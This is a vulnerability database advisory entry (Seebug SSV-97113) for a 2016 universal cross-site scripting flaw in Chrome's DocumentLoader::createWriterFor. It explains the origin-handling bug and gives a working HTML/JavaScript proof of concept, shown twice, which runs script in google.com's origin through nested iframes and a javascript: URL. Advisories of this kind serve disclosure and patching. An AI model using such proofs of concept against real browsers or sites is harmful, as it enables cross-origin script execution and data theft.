chrome: UXSS in DocumentLoader::createWriterFor

基本字段

漏洞编号:
SSV-97113
披露/发现时间:
2016-02-02
提交时间:
2018-01-29
漏洞等级:
漏洞类别:
通用跨站脚本
影响组件:
Google Chrome
漏洞作者:
dcheng
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB

Details:

third_party/WebKit/Source/core/loader/DocumentLoader.cpp:735:

PassRefPtrWillBeRawPtr<DocumentWriter> DocumentLoader::createWriterFor(const Document ownerDocument, const DocumentInit& init,
const AtomicString& mimeType, const AtomicString& encoding, bool dispatch, ParserSynchronizationPolicy parsingPolicy)
{
    LocalFrame* frame = init.frame();

    ASSERT(!frame->document() || !frame->document()->isActive());
    ASSERT(frame->tree().childCount() == 0);

    if (!init.shouldReuseDefaultView())
        frame->setDOMWindow(LocalDOMWindow::create(*frame));

    RefPtrWillBeRawPtr<Document> document = frame->localDOMWindow()->installNewDocument(mimeType, init);
    if (ownerDocument) {
        document->setCookieURL(ownerDocument->cookieURL());
        document->setSecurityOrigin(ownerDocument->securityOrigin());
      }
    }

DocumentLoader calls setSecurityOrigin instead of updateSecurityOrigin, so while the document inherits the correct SecurityOrigin from the owner, its associated v8 context is left with the old security token which is used for access checks.

Repro:

<body>
<script>
var frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "https://www.google.com/intl/en/ads/";
frame.onload = function () {
    frame.onload = null;
    frame.contentWindow.frames[0].location = "data:text/html,<script>(" + function () {
        frame = document.documentElement.appendChild(document.createElement("iframe"));
        frame.contentWindow.setTimeout("parent.document.open()", 0);
        setTimeout(function () { location = "javascript:'<script>parent.eval(\"alert(location)\")</scr" + "ipt>'" }, 0);
    } + "())</scr" + "ipt>";
}
</script>
</body>

Note the document.open() call in the repro is used to set the document URL to "about:blank" which forces the javascript: generated document to inherit the origin from the parent frame's document.

共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<body>
<script>
var frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "https://www.google.com/intl/en/ads/";
frame.onload = function() {
frame.onload = null;
frame.contentWindow.frames[0].location = "data:text/html,<script>(" + function() {
frame = document.documentElement.appendChild(document.createElement("iframe"));
frame.contentWindow.setTimeout("parent.document.open()", 0);
setTimeout(function() {
location = "javascript:'<script>parent.eval(\"alert(location)\")</scr" + "ipt>'"
}, 0);
} + "())</scr" + "ipt>";
}
</script>
</body>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1825
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负